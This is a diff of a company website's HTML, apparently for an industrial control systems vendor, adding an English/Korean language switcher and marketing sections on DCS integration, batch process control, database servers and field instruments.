<a href="#dcs" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.dcs">DCS</a>
|
||||||
<a href="#batch" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors">Batch Process</a>
|
<a href="#batch" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.batch">Batch Process</a>
|
||||||
<a href="#dbsvr" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors">Database Server</a>
|
<a href="#dbsvr" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.dbsvr">Database Server</a>
|
||||||
<a href="#products" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors">Instruments</a>
|
<a href="#products" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.products">Instruments</a>
|
||||||
<a href="#services" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors">Services</a>
|
<a href="#services" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.services">Services</a>
|
||||||
<a href="#about" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors">About</a>
|
<a href="#about" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.about">About</a>
|
||||||
<a href="#contact" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors">Contact</a>
|
<a href="#contact" class="nav-link text-sm font-semibold text-slate-100 hover:text-blue-500 transition-colors" data-i18n="nav.contact">Contact</a>
|
||||||
</nav>
|
</nav>
|
||||||
|
|
||||||
<div class="hidden md:block">
|
<div class="hidden md:flex items-center gap-3">
|
||||||
<button class="bg-blue-600 hover:bg-blue-700 text-white px-7 py-2.5 rounded-full text-xs font-bold shadow-xl transition-all active:scale-95 font-industrial tracking-widest uppercase">
|
<!-- 언어 전환 버튼 -->
|
||||||
Request Quote
|
<div class="flex rounded-full overflow-hidden border border-white/20">
|
||||||
</button>
|
<button onclick="switchLang('en')" data-lang="en" class="lang-btn active-lang px-3 py-1.5 text-[10px] font-bold font-industrial text-white transition-all">EN</button>
|
||||||
|
<button onclick="switchLang('ko')" data-lang="ko" class="lang-btn px-3 py-1.5 text-[10px] font-bold font-industrial text-white transition-all">KO</button>
|
||||||
|
</div>
|
||||||
|
<button class="bg-blue-600 hover:bg-blue-700 text-white px-7 py-2.5 rounded-full text-xs font-bold shadow-xl transition-all active:scale-95 font-industrial tracking-widest uppercase" data-i18n="nav.quote">Request Quote</button>
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
<button id="mobile-menu-btn" class="md:hidden text-white p-2">
|
<button id="mobile-menu-btn" class="md:hidden text-white p-2">
|
||||||
@@ -52,16 +51,25 @@
|
|||||||
</header>
|
</header>
|
||||||
|
|
||||||
<!-- MOBILE MENU -->
|
<!-- MOBILE MENU -->
|
||||||
<div id="mobile-menu" class="fixed inset-0 z-[60] bg-slate-900 flex flex-col p-8 transition-transform translate-x-full duration-500">
|
<div id="mobile-menu" class="fixed inset-0 z-[60] bg-slate-900 flex flex-col p-8 transition-transform translate-x-full duration-500 overflow-y-auto">
|
||||||
<div class="flex justify-end mb-12">
|
<div class="flex justify-between items-center mb-12">
|
||||||
|
<!-- 모바일 언어 전환 -->
|
||||||
|
<div class="flex rounded-full overflow-hidden border border-white/20">
|
||||||
|
<button onclick="switchLang('en')" data-lang="en" class="lang-btn active-lang px-4 py-2 text-xs font-bold font-industrial text-white transition-all">EN</button>
|
||||||
|
<button onclick="switchLang('ko')" data-lang="ko" class="lang-btn px-4 py-2 text-xs font-bold font-industrial text-white transition-all">KO</button>
|
||||||
|
</div>
|
||||||
<button id="close-menu-btn" class="text-white text-3xl">×</button>
|
<button id="close-menu-btn" class="text-white text-3xl">×</button>
|
||||||
</div>
|
</div>
|
||||||
<nav class="flex flex-col gap-8 text-center">
|
<nav class="flex flex-col gap-8 text-center">
|
||||||
<a href="#home" class="text-2xl font-light text-white font-premium">Home</a>
|
<a href="#home" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.home">Home</a>
|
||||||
<a href="#services" class="text-2xl font-light text-white font-premium">Services</a>
|
<a href="#dcs" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.dcs">DCS</a>
|
||||||
<a href="#about" class="text-2xl font-light text-white font-premium">About</a>
|
<a href="#batch" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.batch">Batch Process</a>
|
||||||
<a href="#contact" class="text-2xl font-light text-white font-premium">Contact</a>
|
<a href="#dbsvr" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.dbsvr">Database Server</a>
|
||||||
<button class="mt-8 bg-blue-600 text-white py-5 rounded-2xl font-bold font-industrial tracking-widest uppercase">Request Quote</button>
|
<a href="#products" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.products">Instruments</a>
|
||||||
|
<a href="#services" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.services">Services</a>
|
||||||
|
<a href="#about" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.about">About</a>
|
||||||
|
<a href="#contact" class="text-2xl font-light text-white font-premium hover:text-blue-400 transition-colors" data-i18n="nav.contact">Contact</a>
|
||||||
|
<button class="mt-8 bg-blue-600 hover:bg-blue-700 text-white py-5 rounded-2xl font-bold font-industrial tracking-widest uppercase transition-colors" data-i18n="nav.quote">Request Quote</button>
|
||||||
</nav>
|
</nav>
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
@@ -73,131 +81,264 @@
|
|||||||
<img src="assets/images/ControlRoom3.png" alt="Industrial Facility" class="w-full h-full object-cover">
|
<img src="assets/images/ControlRoom3.png" alt="Industrial Facility" class="w-full h-full object-cover">
|
||||||
<div class="absolute inset-0 bg-gradient-to-r from-slate-950 via-slate-900/80 to-transparent"></div>
|
<div class="absolute inset-0 bg-gradient-to-r from-slate-950 via-slate-900/80 to-transparent"></div>
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
<div class="container mx-auto px-6 relative z-10">
|
<div class="container mx-auto px-6 relative z-10">
|
||||||
<div class="max-w-5xl animate-fade-in">
|
<div class="max-w-5xl animate-fade-in">
|
||||||
<div class="inline-block px-4 py-1.5 mb-8 rounded-full bg-blue-600/20 border border-blue-400/30 text-blue-400 text-[10px] font-bold uppercase industrial-tracking font-industrial">
|
<div class="inline-block px-4 py-1.5 mb-8 rounded-full bg-blue-600/20 border border-blue-400/30 text-blue-400 text-[10px] font-bold uppercase industrial-tracking font-industrial" data-i18n="hero.badge">Precision Industrial Control</div>
|
||||||
Precision Industrial Control
|
<h1 class="text-5xl md:text-8xl font-extralight text-white mb-8 hero-title premium-kerning font-premium" data-i18n="hero.title" data-i18n-type="html">
|
||||||
</div>
|
|
||||||
<h1 class="text-5xl md:text-8xl font-extralight text-white mb-8 hero-title premium-kerning font-premium">
|
|
||||||
Engineering <span class="text-blue-500 font-normal">Precision</span> <br class="hidden md:block"/> Industrial Control
|
Engineering <span class="text-blue-500 font-normal">Precision</span> <br class="hidden md:block"/> Industrial Control
|
||||||
</h1>
|
</h1>
|
||||||
<p class="text-lg md:text-xl text-slate-300 mb-12 leading-relaxed max-w-2xl font-premium font-light opacity-80">
|
<p class="text-lg md:text-xl text-slate-300 mb-12 leading-relaxed max-w-2xl font-premium font-light opacity-80" data-i18n="hero.desc">
|
||||||
Hanmo Control & Network Co., Ltd. provides elite-tier DCS and SCADA architectures for critical infrastructure and modern digital transformation.
|
Hanmo Control & Network Co., Ltd. provides elite-tier DCS and SCADA architectures for critical infrastructure and modern digital transformation.
|
||||||
</p>
|
</p>
|
||||||
<div class="flex flex-col sm:flex-row gap-5">
|
<div class="flex flex-col sm:flex-row gap-5">
|
||||||
<a href="#services" class="bg-blue-600 hover:bg-blue-700 text-white px-10 py-5 rounded-2xl font-bold shadow-2xl transition-all hover:-translate-y-1 text-center font-industrial text-xs tracking-widest uppercase">
|
<a href="#services" class="bg-blue-600 hover:bg-blue-700 text-white px-10 py-5 rounded-2xl font-bold shadow-2xl transition-all hover:-translate-y-1 text-center font-industrial text-xs tracking-widest uppercase" data-i18n="hero.btn1">Explore Expertise</a>
|
||||||
Explore Expertise
|
<a href="#contact" class="bg-white/10 hover:bg-white/20 text-white border border-white/20 backdrop-blur-md px-10 py-5 rounded-2xl font-bold transition-all text-center font-industrial text-xs tracking-widest uppercase" data-i18n="hero.btn2">Consultation</a>
|
||||||
</a>
|
|
||||||
<a href="#contact" class="bg-white/10 hover:bg-white/20 text-white border border-white/20 backdrop-blur-md px-10 py-5 rounded-2xl font-bold transition-all text-center font-industrial text-xs tracking-widest uppercase">
|
|
||||||
Consultation
|
|
||||||
</a>
|
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
<div class="mt-24 grid grid-cols-2 lg:grid-cols-4 gap-4 md:gap-10 max-w-5xl animate-fade-in" style="animation-delay: 0.3s">
|
<div class="mt-24 grid grid-cols-2 lg:grid-cols-4 gap-4 md:gap-10 max-w-5xl animate-fade-in" style="animation-delay: 0.3s">
|
||||||
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
|
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
|
||||||
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">1,500+</div>
|
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">1,500+</div>
|
||||||
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold">Active Nodes</div>
|
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold" data-i18n="stat.nodes">Active Nodes</div>
|
||||||
</div>
|
</div>
|
||||||
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
|
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
|
||||||
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">99.99%</div>
|
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">99.99%</div>
|
||||||
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold">System Uptime</div>
|
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold" data-i18n="stat.uptime">System Uptime</div>
|
||||||
</div>
|
</div>
|
||||||
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
|
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
|
||||||
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">60+</div>
|
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">60+</div>
|
||||||
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold">Engineers</div>
|
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold" data-i18n="stat.engineers">Engineers</div>
|
||||||
</div>
|
</div>
|
||||||
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
|
<div class="p-8 bg-white/5 backdrop-blur-xl rounded-3xl border border-white/10">
|
||||||
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">15</div>
|
<div class="text-3xl md:text-5xl font-extralight text-white mb-2 font-premium premium-kerning">15</div>
|
||||||
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold">Years Excellence</div>
|
<div class="text-[10px] text-slate-400 uppercase industrial-tracking font-industrial font-semibold" data-i18n="stat.years">Years Excellence</div>
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
</section>
|
</section>
|
||||||
|
|
||||||
|
<!-- DCS SECTION -->
|
||||||
|
<section id="dcs" class="py-32 bg-white">
|
||||||
|
<div class="container mx-auto px-6">
|
||||||
|
<div class="text-center max-w-3xl mx-auto mb-24">
|
||||||
|
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="dcs.badge">Advanced Control Systems</h2>
|
||||||
|
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="dcs.title">DCS Integration</h3>
|
||||||
|
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="dcs.desc">Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications.</p>
|
||||||
|
</div>
|
||||||
|
<div class="grid lg:grid-cols-2 gap-16 items-center max-w-6xl mx-auto">
|
||||||
|
<div class="aspect-square rounded-[2.5rem] overflow-hidden shadow-2xl"><img src="https://images.unsplash.com/photo-1518770660439-4636190af475?auto=format&fit=crop&q=80&w=1000" alt="DCS Control Room" class="w-full h-full object-cover"></div>
|
||||||
|
<div>
|
||||||
|
<div class="space-y-8">
|
||||||
|
<div class="flex gap-6">
|
||||||
|
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-shield-alt"></i></div></div>
|
||||||
|
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f1.title">Redundant Architecture</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f1.desc">Fault-tolerant systems with dual processing units ensuring 99.99% uptime</p></div>
|
||||||
|
</div>
|
||||||
|
<div class="flex gap-6">
|
||||||
|
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-network-wired"></i></div></div>
|
||||||
|
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f2.title">Real-time Communication</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f2.desc">Sub-millisecond response times with synchronized control across multiple nodes</p></div>
|
||||||
|
</div>
|
||||||
|
<div class="flex gap-6">
|
||||||
|
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-lock"></i></div></div>
|
||||||
|
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="dcs.f3.title">Security Certified</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="dcs.f3.desc">IEC 62443 compliance with military-grade encryption protocols</p></div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="mt-12"><a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="dcs.btn">Request Technical Specs</a></div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
|
||||||
|
<!-- BATCH PROCESS SECTION -->
|
||||||
|
<section id="batch" class="py-32 bg-slate-50">
|
||||||
|
<div class="container mx-auto px-6">
|
||||||
|
<div class="text-center max-w-3xl mx-auto mb-24">
|
||||||
|
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="batch.badge">Process Automation</h2>
|
||||||
|
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="batch.title">Batch Process Control</h3>
|
||||||
|
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="batch.desc">Sophisticated batch automation for pharmaceutical, chemical, and specialty manufacturing operations.</p>
|
||||||
|
</div>
|
||||||
|
<div class="grid lg:grid-cols-2 gap-16 items-center max-w-6xl mx-auto">
|
||||||
|
<div>
|
||||||
|
<div class="space-y-8">
|
||||||
|
<div class="flex gap-6">
|
||||||
|
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-tasks"></i></div></div>
|
||||||
|
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="batch.f1.title">Recipe Management</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="batch.f1.desc">Dynamic recipe engine with version control and audit trail capabilities</p></div>
|
||||||
|
</div>
|
||||||
|
<div class="flex gap-6">
|
||||||
|
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-chart-bar"></i></div></div>
|
||||||
|
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="batch.f2.title">Performance Analytics</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="batch.f2.desc">Real-time batch tracking with predictive quality monitoring</p></div>
|
||||||
|
</div>
|
||||||
|
<div class="flex gap-6">
|
||||||
|
<div class="flex-shrink-0"><div class="flex items-center justify-center h-12 w-12 rounded-xl bg-blue-600 text-white"><i class="fas fa-check-circle"></i></div></div>
|
||||||
|
<div><h4 class="text-xl font-semibold text-slate-900 mb-2 font-premium" data-i18n="batch.f3.title">GMP Compliant</h4><p class="text-slate-500 leading-relaxed font-light" data-i18n="batch.f3.desc">FDA 21 CFR Part 11 compliance and complete data integrity</p></div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="mt-12"><a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="batch.btn">Start Implementation</a></div>
|
||||||
|
</div>
|
||||||
|
<div class="aspect-square rounded-[2.5rem] overflow-hidden shadow-2xl"><img src="https://images.unsplash.com/photo-1581092918056-0c4c3acd3789?auto=format&fit=crop&q=80&w=1000" alt="Batch Process" class="w-full h-full object-cover"></div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
|
||||||
|
<!-- DATABASE SERVER SECTION -->
|
||||||
|
<section id="dbsvr" class="py-32 bg-white">
|
||||||
|
<div class="container mx-auto px-6">
|
||||||
|
<div class="text-center max-w-3xl mx-auto mb-24">
|
||||||
|
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="db.badge">Data Infrastructure</h2>
|
||||||
|
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="db.title">Database Server Solutions</h3>
|
||||||
|
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="db.desc">Mission-critical historian and data management infrastructure for continuous industrial operations.</p>
|
||||||
|
</div>
|
||||||
|
<div class="grid md:grid-cols-3 gap-8 max-w-6xl mx-auto">
|
||||||
|
<div class="bg-slate-50 rounded-[2.5rem] p-10 border border-slate-100 hover:border-blue-200 transition-all hover:shadow-xl">
|
||||||
|
<div class="w-16 h-16 bg-blue-600 rounded-2xl flex items-center justify-center mb-8 text-white text-2xl"><i class="fas fa-database"></i></div>
|
||||||
|
<h4 class="text-2xl font-semibold text-slate-900 mb-4 font-premium" data-i18n="db.c1.title">High-Performance Historian</h4>
|
||||||
|
<p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="db.c1.desc">SQL Server-based architecture optimized for 1M+ data points per second with sub-second query response</p>
|
||||||
|
<ul class="space-y-3 text-sm text-slate-600">
|
||||||
|
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Time-series optimization</li>
|
||||||
|
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Automatic compression</li>
|
||||||
|
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Hot-cold storage</li>
|
||||||
|
</ul>
|
||||||
|
</div>
|
||||||
|
<div class="bg-slate-50 rounded-[2.5rem] p-10 border border-slate-100 hover:border-blue-200 transition-all hover:shadow-xl">
|
||||||
|
<div class="w-16 h-16 bg-blue-600 rounded-2xl flex items-center justify-center mb-8 text-white text-2xl"><i class="fas fa-shield-alt"></i></div>
|
||||||
|
<h4 class="text-2xl font-semibold text-slate-900 mb-4 font-premium" data-i18n="db.c2.title">Disaster Recovery</h4>
|
||||||
|
<p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="db.c2.desc">Geo-redundant replication with RTO < 15 minutes and RPO < 5 minutes</p>
|
||||||
|
<ul class="space-y-3 text-sm text-slate-600">
|
||||||
|
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Multi-site failover</li>
|
||||||
|
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Continuous backup</li>
|
||||||
|
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Zero data loss</li>
|
||||||
|
</ul>
|
||||||
|
</div>
|
||||||
|
<div class="bg-slate-50 rounded-[2.5rem] p-10 border border-slate-100 hover:border-blue-200 transition-all hover:shadow-xl">
|
||||||
|
<div class="w-16 h-16 bg-blue-600 rounded-2xl flex items-center justify-center mb-8 text-white text-2xl"><i class="fas fa-lock"></i></div>
|
||||||
|
<h4 class="text-2xl font-semibold text-slate-900 mb-4 font-premium" data-i18n="db.c3.title">Security & Compliance</h4>
|
||||||
|
<p class="text-slate-500 leading-relaxed mb-6 font-light" data-i18n="db.c3.desc">Role-based access control, encryption at rest/transit, and full audit logging</p>
|
||||||
|
<ul class="space-y-3 text-sm text-slate-600">
|
||||||
|
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> ISO 27001 certified</li>
|
||||||
|
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> CCPA/GDPR compliant</li>
|
||||||
|
<li class="flex gap-3"><i class="fas fa-check text-blue-600 mt-1"></i> Immutable logs</li>
|
||||||
|
</ul>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="text-center mt-16"><a href="#contact" class="bg-blue-600 hover:bg-blue-700 text-white px-8 py-4 rounded-2xl font-bold shadow-lg transition-all inline-flex items-center gap-3 font-industrial text-xs tracking-widest uppercase" data-i18n="db.btn">Get Infrastructure Consultation</a></div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
|
||||||
|
<!-- INSTRUMENTS SECTION -->
|
||||||
|
<section id="products" class="py-32 bg-slate-50">
|
||||||
|
<div class="container mx-auto px-6">
|
||||||
|
<div class="text-center max-w-3xl mx-auto mb-24">
|
||||||
|
<h2 class="text-blue-600 font-bold uppercase tracking-widest text-[11px] mb-4 font-industrial" data-i18n="inst.badge">Precision Measurement</h2>
|
||||||
|
<h3 class="text-4xl md:text-6xl font-light text-slate-900 mb-8 premium-kerning font-premium" data-i18n="inst.title">Control Instruments</h3>
|
||||||
|
<p class="text-slate-500 text-lg leading-relaxed font-light" data-i18n="inst.desc">Smart field instruments engineered for accuracy and reliability in demanding industrial environments.</p>
|
||||||
|
</div>
|
||||||
|
<div class="grid md:grid-cols-2 lg:grid-cols-4 gap-8">
|
||||||
|
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
|
||||||
|
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-water text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
|
||||||
|
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i1.title">Flow Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i1.desc">Magnetic, Coriolis, and vortex flow meters with ±0.5% accuracy</p>
|
||||||
|
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Range: 0-1000 m³/h</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> 4-20mA / Pulse output</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> IP67 rated</div></div>
|
||||||
|
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
|
||||||
|
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-gauge-high text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
|
||||||
|
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i2.title">Pressure Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i2.desc">Differential and absolute pressure sensors for ultra-high sensitivity</p>
|
||||||
|
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Range: -1 to 1000 bar</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> ±0.1% accuracy</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> ATEX certified</div></div>
|
||||||
|
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
|
||||||
|
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-thermometer-half text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
|
||||||
|
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i3.title">Temperature Sensors</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i3.desc">RTD, thermocouple, and infrared temperature measurement</p>
|
||||||
|
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Range: -50 to +300°C</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> ±0.3°C accuracy</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Fast response time</div></div>
|
||||||
|
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
|
||||||
|
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-fill-drip text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
|
||||||
|
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i4.title">Level Transmitters</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i4.desc">Ultrasonic, radar, and capacitive level sensors</p>
|
||||||
|
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Range: 0-30 meters</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> ±2mm repeatability</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Dust-proof design</div></div>
|
||||||
|
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
|
||||||
|
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-flask text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
|
||||||
|
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i5.title">Analytical Sensors</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i5.desc">pH, conductivity, oxygen, and dissolved gas analyzers</p>
|
||||||
|
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Multi-parameter capability</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Automatic calibration</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Real-time data logging</div></div>
|
||||||
|
<a href="#contact" class="text-blue-600 font-bold text-xs uppercase tracking-widest hover:text-blue-700" data-i18n="inst.quote">Get Quote →</a>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="bg-white rounded-[2.5rem] overflow-hidden border border-slate-100 hover:border-blue-200 transition-all hover:shadow-2xl group">
|
||||||
|
<div class="h-48 bg-gradient-to-br from-blue-50 to-blue-100 flex items-center justify-center"><i class="fas fa-sliders-h text-6xl text-blue-300 group-hover:text-blue-600 transition-colors"></i></div>
|
||||||
|
<div class="p-8"><h4 class="text-lg font-semibold text-slate-900 mb-3 font-premium" data-i18n="inst.i6.title">Control Valves</h4><p class="text-slate-500 text-sm leading-relaxed mb-6 font-light" data-i18n="inst.i6.desc">Smart positioners with HART communication</p>
|
||||||
|
<div class="space-y-2 text-xs text-slate-600 mb-6"><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> ±0.5% repeatability</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> HART protocol</div><div class="flex gap-2"><i class="fas fa-check text-blue-600"></i> Self-tuning algorithm</div></div>
|
||||||
|
